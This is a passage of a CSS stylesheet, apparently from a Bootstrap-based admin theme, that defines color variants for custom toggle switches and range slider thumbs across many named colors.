.custom-switch.custom-switch-on-orange .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(253, 126, 20, 0.25);
}
.custom-switch.custom-switch-on-orange .custom-control-input:checked ~ .custom-control-label::after {
background: #fed1ac;
}
.custom-switch.custom-switch-off-yellow .custom-control-input ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.custom-switch.custom-switch-off-yellow .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-switch.custom-switch-off-yellow .custom-control-input ~ .custom-control-label::after {
background: #876500;
}
.custom-switch.custom-switch-on-yellow .custom-control-input:checked ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.custom-switch.custom-switch-on-yellow .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-switch.custom-switch-on-yellow .custom-control-input:checked ~ .custom-control-label::after {
background: #ffe7a0;
}
.custom-switch.custom-switch-off-green .custom-control-input ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.custom-switch.custom-switch-off-green .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-switch.custom-switch-off-green .custom-control-input ~ .custom-control-label::after {
background: #0f401b;
}
.custom-switch.custom-switch-on-green .custom-control-input:checked ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.custom-switch.custom-switch-on-green .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-switch.custom-switch-on-green .custom-control-input:checked ~ .custom-control-label::after {
background: #86e29b;
}
.custom-switch.custom-switch-off-teal .custom-control-input ~ .custom-control-label::before {
background: #20c997;
border-color: #127155;
}
.custom-switch.custom-switch-off-teal .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(32, 201, 151, 0.25);
}
.custom-switch.custom-switch-off-teal .custom-control-input ~ .custom-control-label::after {
background: #0e5b44;
}
.custom-switch.custom-switch-on-teal .custom-control-input:checked ~ .custom-control-label::before {
background: #20c997;
border-color: #127155;
}
.custom-switch.custom-switch-on-teal .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(32, 201, 151, 0.25);
}
.custom-switch.custom-switch-on-teal .custom-control-input:checked ~ .custom-control-label::after {
background: #94eed3;
}
.custom-switch.custom-switch-off-cyan .custom-control-input ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.custom-switch.custom-switch-off-cyan .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-switch.custom-switch-off-cyan .custom-control-input ~ .custom-control-label::after {
background: #093e47;
}
.custom-switch.custom-switch-on-cyan .custom-control-input:checked ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.custom-switch.custom-switch-on-cyan .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-switch.custom-switch-on-cyan .custom-control-input:checked ~ .custom-control-label::after {
background: #7adeee;
}
.custom-switch.custom-switch-off-white .custom-control-input ~ .custom-control-label::before {
background: #ffffff;
border-color: #cccccc;
}
.custom-switch.custom-switch-off-white .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 255, 255, 0.25);
}
.custom-switch.custom-switch-off-white .custom-control-input ~ .custom-control-label::after {
background: #bfbfbf;
}
.custom-switch.custom-switch-on-white .custom-control-input:checked ~ .custom-control-label::before {
background: #ffffff;
border-color: #cccccc;
}
.custom-switch.custom-switch-on-white .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 255, 255, 0.25);
}
.custom-switch.custom-switch-on-white .custom-control-input:checked ~ .custom-control-label::after {
background: white;
}
.custom-switch.custom-switch-off-gray .custom-control-input ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.custom-switch.custom-switch-off-gray .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-switch.custom-switch-off-gray .custom-control-input ~ .custom-control-label::after {
background: #313539;
}
.custom-switch.custom-switch-on-gray .custom-control-input:checked ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.custom-switch.custom-switch-on-gray .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-switch.custom-switch-on-gray .custom-control-input:checked ~ .custom-control-label::after {
background: #bcc1c6;
}
.custom-switch.custom-switch-off-gray-dark .custom-control-input ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.custom-switch.custom-switch-off-gray-dark .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-switch.custom-switch-off-gray-dark .custom-control-input ~ .custom-control-label::after {
background: black;
}
.custom-switch.custom-switch-on-gray-dark .custom-control-input:checked ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.custom-switch.custom-switch-on-gray-dark .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-switch.custom-switch-on-gray-dark .custom-control-input:checked ~ .custom-control-label::after {
background: #7a8793;
}
.custom-range.custom-range-primary:focus {
outline: none;
}
.custom-range.custom-range-primary:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-primary:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-primary:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-primary::-webkit-slider-thumb {
background-color: #007bff;
}
.custom-range.custom-range-primary::-webkit-slider-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-primary::-moz-range-thumb {
background-color: #007bff;
}
.custom-range.custom-range-primary::-moz-range-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-primary::-ms-thumb {
background-color: #007bff;
}
.custom-range.custom-range-primary::-ms-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-secondary:focus {
outline: none;
}
.custom-range.custom-range-secondary:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-secondary:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-secondary:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-range.custom-range-secondary::-webkit-slider-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-secondary::-webkit-slider-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-secondary::-moz-range-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-secondary::-moz-range-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-secondary::-ms-thumb {
background-color: #6c757d;
}
.custom-range.custom-range-secondary::-ms-thumb:active {
background-color: #caced1;
}
.custom-range.custom-range-success:focus {
outline: none;
}
.custom-range.custom-range-success:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-success:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-success:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-success::-webkit-slider-thumb {
background-color: #28a745;
}
.custom-range.custom-range-success::-webkit-slider-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-success::-moz-range-thumb {
background-color: #28a745;
}
.custom-range.custom-range-success::-moz-range-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-success::-ms-thumb {
background-color: #28a745;
}
.custom-range.custom-range-success::-ms-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-info:focus {
outline: none;
}
.custom-range.custom-range-info:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-info:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-info:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-info::-webkit-slider-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-info::-webkit-slider-thumb:active {
background-color: #90e4f1;
}
.custom-range.custom-range-info::-moz-range-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-info::-moz-range-thumb:active {
background-color: #90e4f1;
}
.custom-range.custom-range-info::-ms-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-info::-ms-thumb:active {
background-color: #90e4f1;
}
.custom-range.custom-range-warning:focus {
outline: none;
}
.custom-range.custom-range-warning:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-warning:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-warning:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-warning::-webkit-slider-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-warning::-webkit-slider-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-warning::-moz-range-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-warning::-moz-range-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-warning::-ms-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-warning::-ms-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-danger:focus {
outline: none;
}
.custom-range.custom-range-danger:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-danger:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-danger:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-danger::-webkit-slider-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-danger::-webkit-slider-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-danger::-moz-range-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-danger::-moz-range-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-danger::-ms-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-danger::-ms-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-light:focus {
outline: none;
}
.custom-range.custom-range-light:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(248, 249, 250, 0.25);
}
.custom-range.custom-range-light:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(248, 249, 250, 0.25);
}
.custom-range.custom-range-light:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(248, 249, 250, 0.25);
}
.custom-range.custom-range-light::-webkit-slider-thumb {
background-color: #f8f9fa;
}
.custom-range.custom-range-light::-webkit-slider-thumb:active {
background-color: white;
}
.custom-range.custom-range-light::-moz-range-thumb {
background-color: #f8f9fa;
}
.custom-range.custom-range-light::-moz-range-thumb:active {
background-color: white;
}
.custom-range.custom-range-light::-ms-thumb {
background-color: #f8f9fa;
}
.custom-range.custom-range-light::-ms-thumb:active {
background-color: white;
}
.custom-range.custom-range-dark:focus {
outline: none;
}
.custom-range.custom-range-dark:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-dark:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-dark:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-range.custom-range-dark::-webkit-slider-thumb {
background-color: #343a40;
}
.custom-range.custom-range-dark::-webkit-slider-thumb:active {
background-color: #88939e;
}
.custom-range.custom-range-dark::-moz-range-thumb {
background-color: #343a40;
}
.custom-range.custom-range-dark::-moz-range-thumb:active {
background-color: #88939e;
}
.custom-range.custom-range-dark::-ms-thumb {
background-color: #343a40;
}
.custom-range.custom-range-dark::-ms-thumb:active {
background-color: #88939e;
}
.custom-range.custom-range-lightblue:focus {
outline: none;
}
.custom-range.custom-range-lightblue:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(60, 141, 188, 0.25);
}
.custom-range.custom-range-lightblue:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(60, 141, 188, 0.25);
}
.custom-range.custom-range-lightblue:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(60, 141, 188, 0.25);
}
.custom-range.custom-range-lightblue::-webkit-slider-thumb {
background-color: #3c8dbc;
}
.custom-range.custom-range-lightblue::-webkit-slider-thumb:active {
background-color: #c0dbeb;
}
.custom-range.custom-range-lightblue::-moz-range-thumb {
background-color: #3c8dbc;
}
.custom-range.custom-range-lightblue::-moz-range-thumb:active {
background-color: #c0dbeb;
}
.custom-range.custom-range-lightblue::-ms-thumb {
background-color: #3c8dbc;
}
.custom-range.custom-range-lightblue::-ms-thumb:active {
background-color: #c0dbeb;
}
.custom-range.custom-range-navy:focus {
outline: none;
}
.custom-range.custom-range-navy:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 31, 63, 0.25);
}
.custom-range.custom-range-navy:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 31, 63, 0.25);
}
.custom-range.custom-range-navy:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 31, 63, 0.25);
}
.custom-range.custom-range-navy::-webkit-slider-thumb {
background-color: #001f3f;
}
.custom-range.custom-range-navy::-webkit-slider-thumb:active {
background-color: #0077f2;
}
.custom-range.custom-range-navy::-moz-range-thumb {
background-color: #001f3f;
}
.custom-range.custom-range-navy::-moz-range-thumb:active {
background-color: #0077f2;
}
.custom-range.custom-range-navy::-ms-thumb {
background-color: #001f3f;
}
.custom-range.custom-range-navy::-ms-thumb:active {
background-color: #0077f2;
}
.custom-range.custom-range-olive:focus {
outline: none;
}
.custom-range.custom-range-olive:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(61, 153, 112, 0.25);
}
.custom-range.custom-range-olive:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(61, 153, 112, 0.25);
}
.custom-range.custom-range-olive:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(61, 153, 112, 0.25);
}
.custom-range.custom-range-olive::-webkit-slider-thumb {
background-color: #3d9970;
}
.custom-range.custom-range-olive::-webkit-slider-thumb:active {
background-color: #abdec7;
}
.custom-range.custom-range-olive::-moz-range-thumb {
background-color: #3d9970;
}
.custom-range.custom-range-olive::-moz-range-thumb:active {
background-color: #abdec7;
}
.custom-range.custom-range-olive::-ms-thumb {
background-color: #3d9970;
}
.custom-range.custom-range-olive::-ms-thumb:active {
background-color: #abdec7;
}
.custom-range.custom-range-lime:focus {
outline: none;
}
.custom-range.custom-range-lime:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(1, 255, 112, 0.25);
}
.custom-range.custom-range-lime:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(1, 255, 112, 0.25);
}
.custom-range.custom-range-lime:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(1, 255, 112, 0.25);
}
.custom-range.custom-range-lime::-webkit-slider-thumb {
background-color: #01ff70;
}
.custom-range.custom-range-lime::-webkit-slider-thumb:active {
background-color: #b4ffd4;
}
.custom-range.custom-range-lime::-moz-range-thumb {
background-color: #01ff70;
}
.custom-range.custom-range-lime::-moz-range-thumb:active {
background-color: #b4ffd4;
}
.custom-range.custom-range-lime::-ms-thumb {
background-color: #01ff70;
}
.custom-range.custom-range-lime::-ms-thumb:active {
background-color: #b4ffd4;
}
.custom-range.custom-range-fuchsia:focus {
outline: none;
}
.custom-range.custom-range-fuchsia:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(240, 18, 190, 0.25);
}
.custom-range.custom-range-fuchsia:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(240, 18, 190, 0.25);
}
.custom-range.custom-range-fuchsia:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(240, 18, 190, 0.25);
}
.custom-range.custom-range-fuchsia::-webkit-slider-thumb {
background-color: #f012be;
}
.custom-range.custom-range-fuchsia::-webkit-slider-thumb:active {
background-color: #fbbaec;
}
.custom-range.custom-range-fuchsia::-moz-range-thumb {
background-color: #f012be;
}
.custom-range.custom-range-fuchsia::-moz-range-thumb:active {
background-color: #fbbaec;
}
.custom-range.custom-range-fuchsia::-ms-thumb {
background-color: #f012be;
}
.custom-range.custom-range-fuchsia::-ms-thumb:active {
background-color: #fbbaec;
}
.custom-range.custom-range-maroon:focus {
outline: none;
}
.custom-range.custom-range-maroon:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(216, 27, 96, 0.25);
}
.custom-range.custom-range-maroon:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(216, 27, 96, 0.25);
}
.custom-range.custom-range-maroon:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(216, 27, 96, 0.25);
}
.custom-range.custom-range-maroon::-webkit-slider-thumb {
background-color: #d81b60;
}
.custom-range.custom-range-maroon::-webkit-slider-thumb:active {
background-color: #f5b0c9;
}
.custom-range.custom-range-maroon::-moz-range-thumb {
background-color: #d81b60;
}
.custom-range.custom-range-maroon::-moz-range-thumb:active {
background-color: #f5b0c9;
}
.custom-range.custom-range-maroon::-ms-thumb {
background-color: #d81b60;
}
.custom-range.custom-range-maroon::-ms-thumb:active {
background-color: #f5b0c9;
}
.custom-range.custom-range-blue:focus {
outline: none;
}
.custom-range.custom-range-blue:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-blue:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-blue:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-range.custom-range-blue::-webkit-slider-thumb {
background-color: #007bff;
}
.custom-range.custom-range-blue::-webkit-slider-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-blue::-moz-range-thumb {
background-color: #007bff;
}
.custom-range.custom-range-blue::-moz-range-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-blue::-ms-thumb {
background-color: #007bff;
}
.custom-range.custom-range-blue::-ms-thumb:active {
background-color: #b3d7ff;
}
.custom-range.custom-range-indigo:focus {
outline: none;
}
.custom-range.custom-range-indigo:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(102, 16, 242, 0.25);
}
.custom-range.custom-range-indigo:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(102, 16, 242, 0.25);
}
.custom-range.custom-range-indigo:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(102, 16, 242, 0.25);
}
.custom-range.custom-range-indigo::-webkit-slider-thumb {
background-color: #6610f2;
}
.custom-range.custom-range-indigo::-webkit-slider-thumb:active {
background-color: #d2b9fb;
}
.custom-range.custom-range-indigo::-moz-range-thumb {
background-color: #6610f2;
}
.custom-range.custom-range-indigo::-moz-range-thumb:active {
background-color: #d2b9fb;
}
.custom-range.custom-range-indigo::-ms-thumb {
background-color: #6610f2;
}
.custom-range.custom-range-indigo::-ms-thumb:active {
background-color: #d2b9fb;
}
.custom-range.custom-range-purple:focus {
outline: none;
}
.custom-range.custom-range-purple:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(111, 66, 193, 0.25);
}
.custom-range.custom-range-purple:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(111, 66, 193, 0.25);
}
.custom-range.custom-range-purple:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(111, 66, 193, 0.25);
}
.custom-range.custom-range-purple::-webkit-slider-thumb {
background-color: #6f42c1;
}
.custom-range.custom-range-purple::-webkit-slider-thumb:active {
background-color: #d5c8ed;
}
.custom-range.custom-range-purple::-moz-range-thumb {
background-color: #6f42c1;
}
.custom-range.custom-range-purple::-moz-range-thumb:active {
background-color: #d5c8ed;
}
.custom-range.custom-range-purple::-ms-thumb {
background-color: #6f42c1;
}
.custom-range.custom-range-purple::-ms-thumb:active {
background-color: #d5c8ed;
}
.custom-range.custom-range-pink:focus {
outline: none;
}
.custom-range.custom-range-pink:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(232, 62, 140, 0.25);
}
.custom-range.custom-range-pink:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(232, 62, 140, 0.25);
}
.custom-range.custom-range-pink:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(232, 62, 140, 0.25);
}
.custom-range.custom-range-pink::-webkit-slider-thumb {
background-color: #e83e8c;
}
.custom-range.custom-range-pink::-webkit-slider-thumb:active {
background-color: #fbddeb;
}
.custom-range.custom-range-pink::-moz-range-thumb {
background-color: #e83e8c;
}
.custom-range.custom-range-pink::-moz-range-thumb:active {
background-color: #fbddeb;
}
.custom-range.custom-range-pink::-ms-thumb {
background-color: #e83e8c;
}
.custom-range.custom-range-pink::-ms-thumb:active {
background-color: #fbddeb;
}
.custom-range.custom-range-red:focus {
outline: none;
}
.custom-range.custom-range-red:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-red:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-red:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-range.custom-range-red::-webkit-slider-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-red::-webkit-slider-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-red::-moz-range-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-red::-moz-range-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-red::-ms-thumb {
background-color: #dc3545;
}
.custom-range.custom-range-red::-ms-thumb:active {
background-color: #f6cdd1;
}
.custom-range.custom-range-orange:focus {
outline: none;
}
.custom-range.custom-range-orange:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(253, 126, 20, 0.25);
}
.custom-range.custom-range-orange:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(253, 126, 20, 0.25);
}
.custom-range.custom-range-orange:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(253, 126, 20, 0.25);
}
.custom-range.custom-range-orange::-webkit-slider-thumb {
background-color: #fd7e14;
}
.custom-range.custom-range-orange::-webkit-slider-thumb:active {
background-color: #ffdfc5;
}
.custom-range.custom-range-orange::-moz-range-thumb {
background-color: #fd7e14;
}
.custom-range.custom-range-orange::-moz-range-thumb:active {
background-color: #ffdfc5;
}
.custom-range.custom-range-orange::-ms-thumb {
background-color: #fd7e14;
}
.custom-range.custom-range-orange::-ms-thumb:active {
background-color: #ffdfc5;
}
.custom-range.custom-range-yellow:focus {
outline: none;
}
.custom-range.custom-range-yellow:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-yellow:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-yellow:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-range.custom-range-yellow::-webkit-slider-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-yellow::-webkit-slider-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-yellow::-moz-range-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-yellow::-moz-range-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-yellow::-ms-thumb {
background-color: #ffc107;
}
.custom-range.custom-range-yellow::-ms-thumb:active {
background-color: #ffeeba;
}
.custom-range.custom-range-green:focus {
outline: none;
}
.custom-range.custom-range-green:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-green:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-green:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-range.custom-range-green::-webkit-slider-thumb {
background-color: #28a745;
}
.custom-range.custom-range-green::-webkit-slider-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-green::-moz-range-thumb {
background-color: #28a745;
}
.custom-range.custom-range-green::-moz-range-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-green::-ms-thumb {
background-color: #28a745;
}
.custom-range.custom-range-green::-ms-thumb:active {
background-color: #9be7ac;
}
.custom-range.custom-range-teal:focus {
outline: none;
}
.custom-range.custom-range-teal:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(32, 201, 151, 0.25);
}
.custom-range.custom-range-teal:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(32, 201, 151, 0.25);
}
.custom-range.custom-range-teal:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(32, 201, 151, 0.25);
}
.custom-range.custom-range-teal::-webkit-slider-thumb {
background-color: #20c997;
}
.custom-range.custom-range-teal::-webkit-slider-thumb:active {
background-color: #aaf1dc;
}
.custom-range.custom-range-teal::-moz-range-thumb {
background-color: #20c997;
}
.custom-range.custom-range-teal::-moz-range-thumb:active {
background-color: #aaf1dc;
}
.custom-range.custom-range-teal::-ms-thumb {
background-color: #20c997;
}
.custom-range.custom-range-teal::-ms-thumb:active {
background-color: #aaf1dc;
}
.custom-range.custom-range-cyan:focus {
outline: none;
}
.custom-range.custom-range-cyan:focus::-webkit-slider-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-cyan:focus::-moz-range-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-cyan:focus::-ms-thumb {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-range.custom-range-cyan::-webkit-slider-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-cyan::-webkit-slider-thumb:active {
background-color: #90e4f1;
}
.custom-range.custom-range-cyan::-moz-range-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-cyan::-moz-range-thumb:active {
background-color: #90e4f1;
}
.custom-range.custom-range-cyan::-ms-thumb {
background-color: #17a2b8;
}
.custom-range.custom-range-cyan::-ms-thumb:active {
background-color: #90e4f1;
}
